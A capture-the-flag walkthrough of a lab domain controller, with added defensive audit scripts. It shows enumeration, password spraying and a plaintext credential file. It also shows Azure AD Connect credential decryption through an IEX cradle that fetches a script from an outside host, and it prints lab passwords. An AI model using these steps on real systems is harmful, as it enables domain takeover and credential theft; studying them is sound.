Tracks-cloud-Monteverde


nmap

└─$ sudo nmap -sS 10.10.10.172 -p- --min-rate=2000          
[sudo] password for fonllge:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 21:44 EST
Nmap scan report for 10.10.10.172
Host is up (0.25s latency).
Not shown: 65526 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
5985/tcp open wsman
49667/tcp open unknown
49696/tcp open unknown


└─$ sudo nmap -sU -Pn 10.10.10.172 --top-ports=200 --min-rate=2000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-24 21:47 EST
Nmap scan report for 10.10.10.172
Host is up (0.30s latency).
Not shown: 196 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap

to User

ldap unauthenticated (anonymous) access

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=MEGABANK,DC=LOCAL
ldapServiceName: MEGABANK.LOCAL:monteverde$@MEGABANK.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
serverName: CN=MONTEVERDE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=MEGABANK,DC=LOCAL
schemaNamingContext: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: DC=MEGABANK,DC=LOCAL
namingContexts: CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL
isSynchronized: TRUE
highestCommittedUSN: 78038
dsServiceName: CN=NTDS Settings,CN=MONTEVERDE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=MEGABANK,DC=LOCAL
dnsHostName: MONTEVERDE.MEGABANK.LOCAL
defaultNamingContext: DC=MEGABANK,DC=LOCAL
currentTime: 20241125050951.0Z
configurationNamingContext: CN=Configuration,DC=MEGABANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

search groups

ldapsearch -x -H ldap://10.10.10.172 -b 'OU=Groups,DC=MEGABANK,DC=LOCAL' '(objectClass=group)' 

# extended LDIF
#
# LDAPv3
# base <OU=Groups,DC=MEGABANK,DC=LOCAL> with scope subtree
# filter: (objectClass=group)
# requesting: ALL
#

# Azure Admins, Groups, MEGABANK.LOCAL
dn: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Azure Admins
member: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
member: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
member: CN=Administrator,CN=Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103001011.0Z
whenChanged: 20200103001032.0Z
uSNCreated: 36889
uSNChanged: 36897
name: Azure Admins
objectGUID:: iCAImwQrNUW6YeEQTXxy+w==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UKQoAAA==
sAMAccountName: Azure Admins
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 20200103123551.0Z
dSCorePropagationData: 16010101000001.0Z

# File Server Admins, Groups, MEGABANK.LOCAL
dn: CN=File Server Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: File Server Admins
distinguishedName: CN=File Server Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103130214.0Z
whenChanged: 20200103130214.0Z
uSNCreated: 41118
uSNChanged: 41118
name: File Server Admins
objectGUID:: XbIZFB31iUu+oE5hb0Gflw==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3ULgoAAA==
sAMAccountName: File Server Admins
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 16010101000000.0Z

# Call Recording Admins, Groups, MEGABANK.LOCAL
dn: CN=Call Recording Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Call Recording Admins
distinguishedName: CN=Call Recording Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103130230.0Z
whenChanged: 20200103130230.0Z
uSNCreated: 41122
uSNChanged: 41122
name: Call Recording Admins
objectGUID:: rM9iiw6U/UitOcZPMeyo/g==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3ULwoAAA==
sAMAccountName: Call Recording Admins
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 16010101000000.0Z

# Reception, Groups, MEGABANK.LOCAL
dn: CN=Reception,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Reception
distinguishedName: CN=Reception,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103130247.0Z
whenChanged: 20200103130247.0Z
uSNCreated: 41126
uSNChanged: 41126
name: Reception
objectGUID:: ZiAJfn6gPEey3sgb7mBWkQ==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UMAoAAA==
sAMAccountName: Reception
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 16010101000000.0Z

# Operations, Groups, MEGABANK.LOCAL
dn: CN=Operations,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Operations
member: CN=Sally Morgan,OU=New York,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=Operations,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103130300.0Z
whenChanged: 20200103130930.0Z
uSNCreated: 41130
uSNChanged: 41187
name: Operations
objectGUID:: HiCe81L9ikCFSReYjd2TPQ==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UMQoAAA==
sAMAccountName: Operations
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 16010101000000.0Z

# Trading, Groups, MEGABANK.LOCAL
dn: CN=Trading,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Trading
member: CN=Dimitris Galanos,OU=Athens,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=Trading,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103130306.0Z
whenChanged: 20200103130829.0Z
uSNCreated: 41134
uSNChanged: 41174
name: Trading
objectGUID:: FiaPvN1+ykKfaRTytjWQzg==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UMgoAAA==
sAMAccountName: Trading
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 16010101000000.0Z

# HelpDesk, Groups, MEGABANK.LOCAL
dn: CN=HelpDesk,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: HelpDesk
member: CN=Ray O'Leary,OU=Toronto,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=HelpDesk,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103130325.0Z
whenChanged: 20200103130815.0Z
uSNCreated: 41138
uSNChanged: 41170
name: HelpDesk
objectGUID:: aLZrfWbg1Eyo2mjbtOFWXA==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UMwoAAA==
sAMAccountName: HelpDesk
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 16010101000000.0Z

# Developers, Groups, MEGABANK.LOCAL
dn: CN=Developers,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Developers
distinguishedName: CN=Developers,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103130340.0Z
whenChanged: 20200103130340.0Z
uSNCreated: 41142
uSNChanged: 41142
name: Developers
objectGUID:: +fTskeAElUaRwaJvDjbehQ==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UNAoAAA==
sAMAccountName: Developers
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 16010101000000.0Z

# search result
search: 2
result: 0 Success

# numResponses: 9
# numEntries: 8

SMB does not allow anonymous access, and nothing of value showed up in the LDAP description fields either.

I got stuck here when I did this box; only after reading a writeup did I learn it was a weak-password spray. Honestly it is pretty dumb, but it had been so long since I ran into a weak password that I'll remember it from now on.

Dump users over RPC

└─$ rpcclient -U '' -N 10.10.10.172 -c 'querydispinfo'
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null)
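The account list above is worth more than a username wordlist: the acb field encodes samr ACB_* flags (every enabled account here carries 0x210, i.e. NORMAL with PWNOEXP set, and the Guest value 0x215 adds DISABLED and PWNOTREQ), and the AAD_ description leaks an installation identifier. The following added audit script (not from the page or any tool it uses) parses querydispinfo output, decodes the flags and reports what a defender would want to fix; the flag table is the standard samr ACB bit layout, and the sample lines are constructed in the page's output format.

```python
import re

# samr ACB_* bits, as shown in rpcclient querydispinfo's "acb:" field
ACB_FLAGS = {
    0x0001: "DISABLED",
    0x0002: "HOMDIRREQ",
    0x0004: "PWNOTREQ",
    0x0008: "TEMPDUP",
    0x0010: "NORMAL",
    0x0020: "MNS",
    0x0040: "DOMTRUST",
    0x0080: "WSTRUST",
    0x0100: "SVRTRUST",
    0x0200: "PWNOEXP",
    0x0400: "AUTOLOCK",
}

# One querydispinfo line; Desc runs to end of line and may be "(null)".
LINE_RE = re.compile(
    r"index:\s+0x[0-9a-f]+\s+RID:\s+(0x[0-9a-f]+)\s+acb:\s+(0x[0-9a-f]+)\s+"
    r"Account:\s+(\S+)\s+Name:\s+(.*?)\s+Desc:\s+(.*)$"
)

# Description fragments that reveal an account's role or deployment details.
SENSITIVE_HINTS = ("service account", "identifier", "password", "sync")

def decode_acb(acb):
    """Return the ACB_* flag names set in an acb bitmask, lowest bit first."""
    return [name for bit, name in ACB_FLAGS.items() if acb & bit]

def parse_querydispinfo(text):
    """Parse rpcclient querydispinfo output into a list of account dicts."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        rid, acb, account, name, desc = m.groups()
        accounts.append({
            "rid": int(rid, 16),
            "flags": decode_acb(int(acb, 16)),
            "account": account,
            "name": name,
            "desc": None if desc == "(null)" else desc,
        })
    return accounts

def audit(accounts):
    """Return {account: [issues]} for accounts a defender should review."""
    findings = {}
    for a in accounts:
        issues = []
        if "PWNOEXP" in a["flags"] and "DISABLED" not in a["flags"]:
            issues.append("password never expires")
        if "PWNOTREQ" in a["flags"]:
            issues.append("password not required")
        if a["desc"] and any(h in a["desc"].lower() for h in SENSITIVE_HINTS):
            issues.append("description leaks account role/identifier")
        if issues:
            findings[a["account"]] = issues
    return findings

# Sample lines in the format of the page's rpcclient output (constructed here).
SAMPLE = """\
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
"""
```

Run `audit(parse_querydispinfo(SAMPLE))` to get the per-account findings; feed it the full output of the command above to review the whole domain.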

Then spraying the usernames as their own passwords with cme (CrackMapExec) yields

SABatchJobs/SABatchJobs

But this user has no remote management rights, so let's look at SMB instead

└─$ smbclient -L '//10.10.10.172' -U 'SABatchJobs%SABatchJobs'   

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
azure_uploads Disk
C$ Disk Default share
E$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
users$ Disk

users$ contains azure.xml

smb: \mhope\> dir
. D 0 Fri Jan 3 08:41:18 2020
.. D 0 Fri Jan 3 08:41:18 2020
azure.xml AR 1212 Fri Jan 3 08:40:23 2020

31999 blocks of size 4096. 28979 blocks available
smb: \mhope\> get azure.xml

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>

This gives us the password for the mhope account

mhope
4n0therD4y@n0th3r$


mhope is a member of Remote Management Users

Get User

to Root

The current user's profile contains a .azure directory holding the Azure token cache and related files

*Evil-WinRM* PS C:\Users\mhope\.azure> download TokenCache.dat

Info: Downloading C:\Users\mhope\.azure\TokenCache.dat to TokenCache.dat

Info: Download successful!
*Evil-WinRM* PS C:\Users\mhope\.azure> dir


Directory: C:\Users\mhope\.azure


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/3/2020 5:35 AM ErrorRecords
-a---- 1/3/2020 5:31 AM 34 AzurePSDataCollectionProfile.json
-a---- 1/3/2020 5:35 AM 2794 AzureRmContext.json
-a---- 1/3/2020 5:31 AM 191 AzureRmContextSettings.json
-a---- 1/3/2020 5:36 AM 7896 TokenCache.dat

Reference for this:

https://www.lares.com/blog/hunting-azure-admins-for-vertical-escalation-part-2/

One option is to steal the Azure token

But it turned out to be of no use.

So consider local privilege escalation instead

https://blog.xpnsec.com/azuread-connect-for-redteam/

The author traced how, with Password Hash Synchronization (PHS) enabled, the sync service reads the encrypted credentials from the local Azure AD Connect database and decrypts them with mcrypt.dll, and provided a PoC.

The PoC mainly revolves around feeding the right parameters to mcrypt.dll's decryption routine; the parameters are as follows

$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)

which correspond to

*Evil-WinRM* PS C:\Users\mhope\.azure\ErrorRecords> sqlcmd -Q 'SELECT keyset_id, instance_id, entropy FROM ADsync.dbo.mms_server_configuration'
keyset_id instance_id entropy
----------- ------------------------------------ ------------------------------------
1 1852B527-DD4F-4ECF-B541-EFCCBFF29E31 194EC2FC-F186-46CF-B44D-071EB61F49CD

$config = $reader.GetString(0)
$crypted = $reader.GetString(1)

which correspond to

*Evil-WinRM* PS C:\Users\mhope\Documents> $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=.;Integrated Security=true;Initial Catalog=ADsync"          
*Evil-WinRM* PS C:\Users\mhope\Documents> $client.Open()
*Evil-WinRM* PS C:\Users\mhope\Documents> $cmd = $client.CreateCommand()
*Evil-WinRM* PS C:\Users\mhope\Documents> $cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"

*Evil-WinRM* PS C:\Users\mhope\Documents>
*Evil-WinRM* PS C:\Users\mhope\Documents> $reader = $cmd.ExecuteReader()
*Evil-WinRM* PS C:\Users\mhope\Documents> $reader.Read() | Out-Null
*Evil-WinRM* PS C:\Users\mhope\Documents> $reader.GetString(0)
<adma-configuration>
<forest-name>MEGABANK.LOCAL</forest-name>
<forest-port>0</forest-port>
<forest-guid>{00000000-0000-0000-0000-000000000000}</forest-guid>
<forest-login-user>administrator</forest-login-user>
<forest-login-domain>MEGABANK.LOCAL</forest-login-domain>
<sign-and-seal>1</sign-and-seal>
<ssl-bind crl-check="0">0</ssl-bind>
<simple-bind>0</simple-bind>
<default-ssl-strength>0</default-ssl-strength>
<parameter-values>
<parameter name="forest-login-domain" type="string" use="connectivity" dataType="String">MEGABANK.LOCAL</parameter>
<parameter name="forest-login-user" type="string" use="connectivity" dataType="String">administrator</parameter>
<parameter name="password" type="encrypted-string" use="connectivity" dataType="String" encrypted="1" />
<parameter name="forest-name" type="string" use="connectivity" dataType="String">MEGABANK.LOCAL</parameter>
<parameter name="sign-and-seal" type="string" use="connectivity" dataType="String">1</parameter>
<parameter name="crl-check" type="string" use="connectivity" dataType="String">0</parameter>
<parameter name="ssl-bind" type="string" use="connectivity" dataType="String">0</parameter>
<parameter name="simple-bind" type="string" use="connectivity" dataType="String">0</parameter>
<parameter name="Connector.GroupFilteringGroupDn" type="string" use="global" dataType="String" />
<parameter name="ADS_UF_ACCOUNTDISABLE" type="string" use="global" dataType="String" intrinsic="1">0x2</parameter>
<parameter name="ADS_GROUP_TYPE_GLOBAL_GROUP" type="string" use="global" dataType="String" intrinsic="1">0x00000002</parameter>
<parameter name="ADS_GROUP_TYPE_DOMAIN_LOCAL_GROUP" type="string" use="global" dataType="String" intrinsic="1">0x00000004</parameter>
<parameter name="ADS_GROUP_TYPE_LOCAL_GROUP" type="string" use="global" dataType="String" intrinsic="1">0x00000004</parameter>
<parameter name="ADS_GROUP_TYPE_UNIVERSAL_GROUP" type="string" use="global" dataType="String" intrinsic="1">0x00000008</parameter>
<parameter name="ADS_GROUP_TYPE_SECURITY_ENABLED" type="string" use="global" dataType="String" intrinsic="1">0x80000000</parameter>
<parameter name="Forest.FQDN" type="string" use="global" dataType="String" intrinsic="1">MEGABANK.LOCAL</parameter>
<parameter name="Forest.LDAP" type="string" use="global" dataType="String" intrinsic="1">DC=MEGABANK,DC=LOCAL</parameter>
<parameter name="Forest.Netbios" type="string" use="global" dataType="String" intrinsic="1">MEGABANK</parameter>
</parameter-values>
<password-hash-sync-config>
<enabled>1</enabled>
<target>{B891884F-051E-4A83-95AF-2544101C9083}</target>
</password-hash-sync-config>
</adma-configuration>

*Evil-WinRM* PS C:\Users\mhope\Documents> $reader.GetString(1)
8AAAAAgAAABQhCBBnwTpdfQE6uNJeJWGjvps08skADOJDqM74hw39rVWMWrQukLAEYpfquk2CglqHJ3GfxzNWlt9+ga+2wmWA0zHd3uGD8vk/vfnsF3p2aKJ7n9IAB51xje0QrDLNdOqOxod8n7VeybNW/1k+YWuYkiED3xO8Pye72i6D9c5QTzjTlXe5qgd4TCdp4fmVd+UlL/dWT/mhJHve/d9zFr2EX5r5+1TLbJCzYUHqFLvvpCd1rJEr68g95aWEcUSzl7mTXwR4Pe3uvsf2P8Oafih7cjjsubFxqBioXBUIuP+BPQCETPAtccl7BNRxKb2aGQ=
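The private_configuration_xml above is the real finding for a defender: the AD DS connector account is the built-in administrator, and password hash sync is enabled, so whoever can read and decrypt this row holds a Tier 0 credential. The following added script (not from the page or the PoC it references) parses an adma-configuration document and reports the settings a reviewer would flag; the sample XML is a trimmed, constructed copy of the page's output, and the check for a hardened variant with a dedicated sync account is an assumption about what good looks like.

```python
import xml.etree.ElementTree as ET

# Built-in or generic admin names that should never be the AD DS connector account.
PRIVILEGED_NAMES = {"administrator", "admin", "domain admin"}

def parse_adma_config(xml_text):
    """Pull the security-relevant settings out of an <adma-configuration> document."""
    root = ET.fromstring(xml_text)

    def text(path):
        el = root.find(path)
        return el.text.strip() if el is not None and el.text else None

    params = {p.get("name"): p for p in root.iter("parameter")}
    pw = params.get("password")
    return {
        "forest": text("forest-name"),
        "login_user": text("forest-login-user"),
        "login_domain": text("forest-login-domain"),
        "sign_and_seal": text("sign-and-seal") == "1",
        "ssl_bind": text("ssl-bind") == "1",
        "simple_bind": text("simple-bind") == "1",
        "password_encrypted": pw is not None and pw.get("encrypted") == "1",
        "phs_enabled": text("password-hash-sync-config/enabled") == "1",
    }

def audit_adma_config(cfg):
    """Return the findings a reviewer would raise about this connector configuration."""
    findings = []
    user = (cfg["login_user"] or "").lower()
    if user in PRIVILEGED_NAMES:
        findings.append(f"connector account '{cfg['login_user']}' is a built-in admin; "
                        "use a dedicated least-privilege sync account")
    if cfg["simple_bind"]:
        findings.append("simple bind enabled: credentials go over LDAP in the clear")
    if not cfg["sign_and_seal"] and not cfg["ssl_bind"]:
        findings.append("neither sign-and-seal nor SSL bind protects the LDAP channel")
    if not cfg["password_encrypted"]:
        findings.append("password parameter is not marked encrypted")
    if cfg["phs_enabled"]:
        findings.append("password hash sync enabled: the connector account holds "
                        "directory replication rights, treat its credential as Tier 0")
    return findings

# Trimmed copy of the page's private_configuration_xml (constructed sample).
SAMPLE_XML = """<adma-configuration>
<forest-name>MEGABANK.LOCAL</forest-name>
<forest-login-user>administrator</forest-login-user>
<forest-login-domain>MEGABANK.LOCAL</forest-login-domain>
<sign-and-seal>1</sign-and-seal>
<ssl-bind crl-check="0">0</ssl-bind>
<simple-bind>0</simple-bind>
<parameter-values>
<parameter name="forest-login-user" type="string" use="connectivity" dataType="String">administrator</parameter>
<parameter name="password" type="encrypted-string" use="connectivity" dataType="String" encrypted="1" />
</parameter-values>
<password-hash-sync-config>
<enabled>1</enabled>
</password-hash-sync-config>
</adma-configuration>"""
```

`audit_adma_config(parse_adma_config(SAMPLE_XML))` returns two findings for the page's configuration; swapping the login user for a dedicated sync account leaves only the informational PHS note.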

Loading the PoC directly here throws an error, shown below

*Evil-WinRM* PS C:\Users\mhope\Documents> $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"                
*Evil-WinRM* PS C:\Users\mhope\Documents> $client.Open()

Exception calling "Open" with "0" argument(s): "A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: SQL Network Interfaces, error: 52 - Unable to locate a Local Database Runtime installation. Verify that SQL Server Express is properly installed and that the Local Database Runtime feature is enabled.)"
At line:1 char:1
+ $client.Open()
+ ~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : SqlException

Looked it up:

https://stackoverflow.com/questions/76810566/using-system-data-sqlclient-sqlconnection-from-powershell-to-execute-contents-of

https://stackoverflow.com/questions/64410277/cannot-find-sql-server-sqlconnection-problem

The PoC's database connection string is slightly off; it took a while to debug

...
*Evil-WinRM* PS C:\Users\mhope\Documents> $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost\ADsync;Integrated Security=true;Initial Catalog=ADsync"
*Evil-WinRM* PS C:\Users\mhope\Documents> $client.open()
Exception calling "Open" with "0" argument(s): "A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: SQL Network Interfaces, error: 26 - Error Locating Server/Instance Specified)"
At line:1 char:1
+ $client.open()
+ ~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : SqlException
*Evil-WinRM* PS C:\Users\mhope\Documents> $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=.;Integrated Security=true;Initial Catalog=ADsync"
*Evil-WinRM* PS C:\Users\mhope\Documents> $client.open()

Changing it to the following fixes it; the Data Source part of the connection string was the problem

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=.;Integrated Security=true;Initial Catalog=ADSync"

and the error goes away

*Evil-WinRM* PS C:\Users\mhope\Documents> IEX(new-object Net.WebClient).downloadstring("http://10.10.16.2/azuread_decrypt_msol.ps1")
Domain: MEGABANK.LOCAL
Username:administrator
Password: d0m@in4dminyeah!

get Root